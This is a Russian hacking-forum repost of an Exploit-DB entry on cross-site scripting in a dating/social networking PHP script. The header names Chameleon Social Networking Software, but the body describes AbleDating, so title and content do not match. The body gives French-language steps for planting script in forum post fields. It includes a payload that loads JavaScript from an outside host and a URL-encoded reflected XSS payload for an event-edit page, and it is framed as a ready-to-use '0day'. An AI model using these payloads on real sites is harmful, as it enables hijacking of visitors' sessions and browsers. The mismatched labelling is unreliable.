Exploit Chameleon Social Networking Software - Persistent Cross-Site Scripting

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
15543
Проверка EDB
  1. Пройдено
Автор
DR-MOSTA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-4366
Дата публикации
2010-11-15
Код:
# Exploit Title: AbleDating script 2010 Critical XSS Vulnerability 
# Date: 15.11.2010 
# Author: Dr-mosta 
# Category: webapps/0day 
# Script url: http://www.abk-soft.com/matchmaking_software_demo.html 
# Version: N/A 
# Tested on: 
# CVE :   

      [ EXPL0!T ] 

IL vaut faut inscrire au site apres aller a la partie forum ou par le 
lien  : www.sitevictim.com/forum.php
aper essais de choisir un category et essais de cree un Sujet dans le forum
vous pouvez ajouté votre code xss das le titre de Poster  ou Description ou Message

Exemple exploit code :

“><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><”

Exploit 2:

IL vaut faut inscrire au site apres l'Exploit :
(vuln): server/events_event_edit.php?events_event_edit.php?event_private=1&date=[XSS]
 
Exemple exploit code :

server/events_event_edit.php?event_private=1&date=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%20%3Cinput%20style=%22visibility:%20visible;%22%20class=%22inp_lblack%20no_abk%20hasDatepicker%22%20id=%22event_date%22%20autocomplete=%22off%22%20name=%22event_date%22%20value=%2212-15-2010

      Greetz = TeaM MostA , exploit-db.com 

Good Luck .
 
Источник
www.exploit-db.com

Похожие темы